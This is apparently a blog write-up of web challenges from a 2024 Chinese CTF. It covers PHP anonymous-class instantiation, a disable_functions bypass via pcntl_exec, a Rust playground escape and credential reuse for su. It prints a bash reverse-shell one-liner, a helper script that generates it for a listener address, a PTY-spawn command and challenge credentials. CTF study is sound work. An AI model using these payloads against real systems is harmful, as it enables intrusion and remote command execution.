Z1d10tのBlog

A note for myself, have fun!

  1. WEB
    1.1. ezphezph
    1.2. unauth
    1.3. playground
      1.3.1. Method 1
      1.3.2. Method 2
    1.4. Simp1escape
  2. Closing

2024 红明谷 CTF: web writeups (partial)

WEB

ezphezph

Key point:

  • PHP side-channel attack (the filter-chain error-based oracle for arbitrary file read)

Reference article: https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle

Tool: https://github.com/synacktiv/php_filter_chains_oracle_exploit

The annoying part is that the oracle may fail to leak anything in some environments; it is somewhat luck-dependent.


Source leaked from the challenge environment with the oracle:

The challenge description also states the version is PHP 8.3.2.

```php
<?php
if (isset($_GET['ezphpPhp8'])) {
    highlight_file(__FILE__);
} else {
    die("No");
}
// Anonymous class declared on line 7 of this file: its engine-generated name
// is what we have to reproduce later.
$a = new class {
    function __construct()
    {
    }

    function getflag()
    {
        system('cat /flag');
    }
};
// unset() only drops the variable; the class stays registered in the class table.
unset($a);
// Class name comes straight from the query string, so new $a() can instantiate
// the anonymous class again if we know its exact (NUL-containing) name.
$a = $_GET['ezphpPhp8'];
$f = new $a();
$f->getflag();
?>
```

This hinges on how PHP names anonymous classes.

We need to recover the generated name of that anonymous class.

```php
$obj = new class{};
// Class name (PHP 8): 'class@anonymous' + chr(0) + php file path + ':' + start line + '$' + hex counter
// The trailing value is a per-file runtime-definition counter, not a column; it is
// usually 0 for the first anonymous class in the file.
echo get_class($obj);
```

Spin up a local environment and read the class name with get_class. You need to reproduce the file path and layout exactly to get it in one shot; otherwise the trailing number has to be brute-forced. Then percent-encode the name (including the NUL byte) and send it as the parameter:

```
class%40anonymous%00%2Fvar%2Fwww%2Fhtml%2Fflag.php%3A7%240
```
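The following helper is an added example, not part of the original writeup: it locates the `new class` line in leaked PHP source, builds the PHP 8 anonymous class name (`class@anonymous` + NUL + path + `:` + line + `$` + hex counter), percent-encodes it for the GET parameter, and produces a candidate list when the counter is unknown. The file path `/var/www/html/flag.php` is taken from the payload above; the embedded source is a trimmed copy of the leaked flag.php.

```python
# Added example: reproduce PHP 8's anonymous class name for the ezphezph payload.
# Name format (Zend/zend_compile.c, zend_generate_anon_class_name):
#   "<prefix>@anonymous" + "\0" + <file path> + ":" + <start line> + "$" + <hex counter>
# prefix is "class", or the parent/first interface name when the class extends/implements one.
import re
from urllib.parse import quote


def find_anon_class_lines(source: str) -> list[int]:
    """1-based line numbers on which `new class` appears in leaked PHP source."""
    return [i for i, line in enumerate(source.splitlines(), start=1)
            if re.search(r"\bnew\s+class\b", line)]


def anon_class_name(path: str, line: int, counter: int = 0, prefix: str = "class") -> str:
    """Raw, NUL-containing class name exactly as PHP stores it in the class table."""
    return f"{prefix}@anonymous\0{path}:{line}${counter:x}"


def anon_class_param(path: str, line: int, counter: int = 0) -> str:
    """Same name percent-encoded for a query string (safe='' so '/' and '@' are encoded too)."""
    return quote(anon_class_name(path, line, counter), safe="")


def candidate_params(path: str, line: int, max_counter: int = 16) -> list[str]:
    """Payloads to try in order when the counter could not be confirmed locally."""
    return [anon_class_param(path, line, c) for c in range(max_counter)]


# Constructed copy of the leaked flag.php (trimmed); line 7 declares the anonymous class.
LEAKED_SOURCE = """<?php
if (isset($_GET['ezphpPhp8'])) {
highlight_file(__FILE__);
} else {
die("No");
}
$a = new class {
function __construct()
{
}
function getflag()
{
system('cat /flag');
}
};
"""

if __name__ == "__main__":
    target_line = find_anon_class_lines(LEAKED_SOURCE)[0]
    # Assumed web root path; adjust to the real deployment.
    print(anon_class_param("/var/www/html/flag.php", target_line))
```

With the leaked source the helper yields the exact payload shown above; if the first candidate returns "No" or a class-not-found error, walk through `candidate_params` to brute-force the counter.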


Or, like 大头师傅 did, simply look up the naming scheme in the PHP changelog (learned something new):


References:

https://hi-arkin.com/archives/php-anonymous-stdClass.html

https://www.php.net/manual/zh/language.oop5.anonymous.php

https://www.php.net/ChangeLog-8.php#8.3.4

unauth

A pity: we were very close at the end but did not get the flag.

Found www.zip (source backup).

Logged in with admin / 2e525e29e465f45d8d7c56319fe73036.

The flag is in the filesystem root, probably not readable with the current privileges. environ cannot be read either.

The web root contains config.inc.php:

```php
<?php

# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
# Thanks to @digininja for the fix.

# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL'; // Currently disabled

# Database variables
# WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
# Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must use create a dedicated DVWA user.
# See README.md for more information on this.
$_DVWA = array();
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = 'b90e0086d8b1165403de6974c4167165';

# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ 'db_port '] = '5432';

# ReCAPTCHA settings
# Used for the 'Insecure CAPTCHA' module
# You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

# Default security level
# Default value for the secuirty level with each session.
# The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'.
$_DVWA[ 'default_security_level' ] = 'impossible';

# Default PHPIDS status
# PHPIDS status with each session.
# The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.
$_DVWA[ 'default_phpids_level' ] = 'disabled';

# Verbose PHPIDS messages
# Enabling this will show why the WAF blocked the request on the blocked request.
# The default is 'disabled'. You can set this to be either 'true' or 'false'.
$_DVWA[ 'default_phpids_verbose' ] = 'false';

?>
```

highlight_file is not banned, so read the PHP configuration and check disable_functions:

```ini
# highlight_file("/usr/local/etc/php/php.ini");

disable_functions = eval,assert,fwrite,file_put_contents,phpinfo,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,lin,putenv,mail,chroot,chgrp,dl,readlink
```

pcntl_exec() is missing from the list (most of the pcntl_* family is banned, but not this one). Learned this command-execution primitive; ip and port below are the attacker's listener:

```php
pcntl_exec("/bin/bash", array("-c", "bash -i >& /dev/tcp/ip/port 0>&1"), array());
```
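As an added example (not from the original writeup), the script below parses the leaked disable_functions line, diffs it against a small reference list of exec-capable PHP functions chosen for this example, and reports which sinks the denylist leaves open; it also renders the pcntl_exec reverse-shell one-liner for a given listener. The reference list is not exhaustive, and the entry `lin` is kept exactly as it appears in the leaked config.

```python
# Added example: audit a php.ini disable_functions line for leftover exec sinks.
import re

# This example's own, deliberately short list of well-known command-execution / code-execution sinks.
EXEC_SINKS = (
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open",
    "pcntl_exec", "dl", "putenv", "mail", "assert", "eval",
)

# Constructed copy of the php.ini excerpt shown in the writeup.
LEAKED_INI = """
; partial php.ini
disable_functions = eval,assert,fwrite,file_put_contents,phpinfo,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,lin,putenv,mail,chroot,chgrp,dl,readlink
"""


def parse_disable_functions(ini_text: str) -> set[str]:
    """Function names listed in disable_functions, lower-cased (PHP function names are case-insensitive).

    PHP accepts commas and/or whitespace as separators, so split on both.
    """
    m = re.search(r"^\s*disable_functions\s*=\s*(.*)$", ini_text, re.MULTILINE)
    if not m:
        return set()
    return {f.lower() for f in re.split(r"[,\s]+", m.group(1).strip()) if f}


def remaining_exec_sinks(ini_text: str) -> list[str]:
    """Sinks from EXEC_SINKS that the denylist does NOT cover, in reference-list order."""
    disabled = parse_disable_functions(ini_text)
    return [f for f in EXEC_SINKS if f not in disabled]


def pcntl_exec_payload(ip: str, port: int) -> str:
    """PHP one-liner that uses pcntl_exec to spawn a bash reverse shell to ip:port."""
    cmd = f"bash -i >& /dev/tcp/{ip}/{port} 0>&1"
    return f'pcntl_exec("/bin/bash", array("-c", "{cmd}"), array());'


if __name__ == "__main__":
    for sink in remaining_exec_sinks(LEAKED_INI):
        print("not disabled:", sink)
    # Placeholder listener address; replace with the real one.
    print(pcntl_exec_payload("10.0.0.1", 4444))
```

Against the leaked configuration the only sink left open from the reference list is pcntl_exec, which is exactly the primitive used above.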

After getting a shell we still need to escalate privileges.

Privilege escalation via su: the database password from config.inc.php turns out to be admin's password as well (credential reuse, hard to believe but there it is).


su needs a real TTY, so first spawn one with Python (from: https://www.freebuf.com/articles/system/362070.html):

```shell
python -c '__import__("pty").spawn("/bin/bash")'
```

Then just su with that password.

playground

The Rust handler for the playground:

```rust
use rand::Rng;
use rocket::post;
use std::fs::{self, File};
use std::io::Write;
use std::process::Command;

#[post("/rust_code", data = "<code>")]
fn run_rust_code(code: String) -> String {
    // The only "sandbox": a substring denylist on the literal "std".
    // It blocks `use std::...` but not `include!` or an `extern "C"` block.
    if code.contains("std") {
        return "Error: std is not allowed".to_string();
    }
    // generate a random 5 length file name
    let file_name = rand::thread_rng()
        .sample_iter(&rand::distributions::Alphanumeric)
        .take(5)
        .map(char::from)
        .collect::<String>();
    if let Ok(mut file) = File::create(format!("playground/{}.rs", &file_name)) {
        file.write_all(code.as_bytes());
    }
    // Compile the submitted source. On failure the compiler's stderr is returned
    // verbatim to the client, which is what method 1 relies on.
    if let Ok(build_output) = Command::new("rustc")
        .arg(format!("playground/{}.rs", &file_name))
        .arg("-C")
        .arg("debuginfo=0")
        .arg("-C")
        .arg("opt-level=3")
        .arg("-o")
        .arg(format!("playground/{}", &file_name))
        .output()
    {
        if !build_output.status.success() {
            fs::remove_file(format!("playground/{}.rs", &file_name));
            return String::from_utf8_lossy(build_output.stderr.as_slice()).to_string();
        }
    }
    fs::remove_file(format!("playground/{}.rs", &file_name));
    // Run the freshly built binary with the server's privileges and echo its stdout/stderr.
    if let Ok(output) = Command::new(format!("playground/{}", &file_name)).output() {
        if !output.status.success() {
            fs::remove_file(format!("playground/{}", &file_name));
            return String::from_utf8_lossy(output.stderr.as_slice()).to_string();
        } else {
            fs::remove_file(format!("playground/{}", &file_name));
            return String::from_utf8_lossy(output.stdout.as_slice()).to_string();
        }
    }
    return String::default();
}
```

Method 1

Whatever is POSTed as data to /rust_code gets compiled. According to 大头师傅's writeup, you can read the flag through the compile error: `include!` pulls the file in as Rust source, the flag is not valid Rust, and rustc's diagnostic quotes the offending contents, which the handler returns as build stderr.

```http
POST /rust_code HTTP/1.1
Host: eci-2ze7qox8oygjcap3uy31.cloudeci1.ichunqiu.com:8000
Content-Length: 17
Content-Type: application/x-www-form-urlencoded

include!("/flag")
```

I don't really know Rust either.

Method 2

Solved by ph0 师傅 from VN.

Reading a file in Rust without touching std:

Rust can call into the C library directly, which effectively lets you run C code; declaring and calling libc's system() is enough, and the declaration never contains the substring "std":

```rust
extern "C" {
    fn system(command: *const i8) -> i32; // libc system(); no "std" substring, so it passes the filter
}
fn main() {
    unsafe { system("cat /flag\0".as_ptr() as *const i8); } // C strings must be NUL-terminated
}
```

Not very familiar with Rust.

Another quite detailed writeup by another player: https://blog.csdn.net/uuzeray/article/details/137348209

Simp1escape

Reportedly a 302 redirect combined with Thymeleaf SSTI.

Closing

Solved these together with VN 师傅 in the time left over from fighting with calculus. A really good experience; I love solving challenges as a team like this!
